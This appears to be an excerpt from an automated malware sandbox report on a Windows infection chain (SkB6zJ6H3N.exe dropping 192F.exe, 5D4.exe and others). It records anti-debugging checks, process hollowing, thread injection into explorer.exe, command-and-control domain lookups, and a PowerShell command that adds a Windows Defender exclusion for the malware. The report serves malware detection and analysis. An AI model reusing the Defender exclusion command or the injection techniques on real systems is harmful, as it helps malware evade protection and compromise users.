Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E760 mov eax, dword ptr fs:[00000030h] 29_2_6A93E760
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8F6A mov eax, dword ptr fs:[00000030h] 29_2_6A9E8F6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CF6A mov eax, dword ptr fs:[00000030h] 29_2_6A94CF6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CF6A mov eax, dword ptr fs:[00000030h] 29_2_6A94CF6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91649B mov eax, dword ptr fs:[00000030h] 29_2_6A91649B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91649B mov eax, dword ptr fs:[00000030h] 29_2_6A91649B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B mov eax, dword ptr fs:[00000030h] 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B mov eax, dword ptr fs:[00000030h] 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911480 mov eax, dword ptr fs:[00000030h] 29_2_6A911480
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914CB0 mov eax, dword ptr fs:[00000030h] 29_2_6A914CB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D4B0 mov eax, dword ptr fs:[00000030h] 29_2_6A94D4B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9CB3 mov eax, dword ptr fs:[00000030h] 29_2_6A9E9CB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8CD6 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8CD6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912CDB mov eax, dword ptr fs:[00000030h] 29_2_6A912CDB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D14FB mov eax, dword ptr fs:[00000030h] 29_2_6A9D14FB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD4E1 mov eax, dword ptr fs:[00000030h] 29_2_6A9CD4E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C14 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8C14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E740D mov eax, dword ptr fs:[00000030h] 29_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E740D mov eax, dword ptr fs:[00000030h] 29_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E740D mov eax, dword ptr fs:[00000030h] 29_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932430 mov eax, dword ptr fs:[00000030h] 29_2_6A932430
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932430 mov eax, dword ptr fs:[00000030h] 29_2_6A932430
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914439 mov eax, dword ptr fs:[00000030h] 29_2_6A914439
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94BC2C mov eax, dword ptr fs:[00000030h] 29_2_6A94BC2C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8450 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8450
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A955C70 mov eax, dword ptr fs:[00000030h] 29_2_6A955C70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C75 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8C75
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93746D mov eax, dword ptr fs:[00000030h] 29_2_6A93746D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913591 mov eax, dword ptr fs:[00000030h] 29_2_6A913591
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 29_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 29_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 29_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9435A1 mov eax, dword ptr fs:[00000030h] 29_2_6A9435A1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFDD3 mov eax, dword ptr fs:[00000030h] 29_2_6A9CFDD3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9115C1 mov eax, dword ptr fs:[00000030h] 29_2_6A9115C1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9195F0 mov eax, dword ptr fs:[00000030h] 29_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9195F0 mov ecx, dword ptr fs:[00000030h] 29_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C8DF1 mov eax, dword ptr fs:[00000030h] 29_2_6A9C8DF1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9495EC mov eax, dword ptr fs:[00000030h] 29_2_6A9495EC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 29_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 29_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 29_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F51D mov eax, dword ptr fs:[00000030h] 29_2_6A91F51D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91AD30 mov eax, dword ptr fs:[00000030h] 29_2_6A91AD30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8D34 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8D34
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944D3B mov eax, dword ptr fs:[00000030h] 29_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944D3B mov eax, dword ptr fs:[00000030h] 29_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944D3B mov eax, dword ptr fs:[00000030h] 29_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 mov eax, dword ptr fs:[00000030h] 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 mov eax, dword ptr fs:[00000030h] 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 mov eax, dword ptr fs:[00000030h] 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 mov eax, dword ptr fs:[00000030h] 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 mov eax, dword ptr fs:[00000030h] 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A937D50 mov eax, dword ptr fs:[00000030h] 29_2_6A937D50
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953D43 mov eax, dword ptr fs:[00000030h] 29_2_6A953D43
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C8D47 mov eax, dword ptr fs:[00000030h] 29_2_6A9C8D47
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C3D40 mov eax, dword ptr fs:[00000030h] 29_2_6A9C3D40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91354C mov eax, dword ptr fs:[00000030h] 29_2_6A91354C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91354C mov eax, dword ptr fs:[00000030h] 29_2_6A91354C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C577 mov eax, dword ptr fs:[00000030h] 29_2_6A93C577
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C577 mov eax, dword ptr fs:[00000030h] 29_2_6A93C577
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_02C00D90 mov eax, dword ptr fs:[00000030h] 33_2_02C00D90
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_02C0092B mov eax, dword ptr fs:[00000030h] 33_2_02C0092B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_00426320 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426320
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A946B90 rdtsc 29_2_6A946B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_004026C8 LdrLoadDll, 26_1_004026C8
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_00426320 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426320
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_0041D090 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D090
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_00426320 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00426320
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_0041D090 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0041D090

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 319A.exe.7.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\cviueca Memory written: C:\Users\user\AppData\Roaming\cviueca base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Memory written: unknown base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Memory written: unknown base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_02C70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 22_2_02C70110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Thread created: C:\Windows\explorer.exe EIP: 3111920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Thread created: unknown EIP: 4EC1920 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Thread created: unknown EIP: 5011920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\192F.exe Thread created: unknown EIP: 54219C0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Thread created: unknown EIP: 5051920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section unmapped: unknown base address: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section unmapped: unknown base address: 400000 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: unknown unknown Jump to behavior
